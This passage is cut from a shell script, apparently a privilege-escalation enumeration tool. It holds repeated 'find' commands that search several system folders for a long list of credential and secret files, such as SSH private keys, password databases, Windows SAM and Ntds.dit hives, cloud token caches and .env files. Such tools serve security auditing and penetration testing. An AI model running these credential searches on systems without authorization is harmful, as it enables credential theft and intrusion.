\"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"sess_*\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"kadm5.acl\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_OPT=`eval_bckgrd "find ${ROOT_FOLDER}opt -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_PRIVATE=`eval_bckgrd "find ${ROOT_FOLDER}private -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"sess_*\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"kadm5.acl\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_RUN=`eval_bckgrd "find ${ROOT_FOLDER}run -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SBIN=`eval_bckgrd "find ${ROOT_FOLDER}sbin -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SNAP=`eval_bckgrd "find ${ROOT_FOLDER}snap -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name 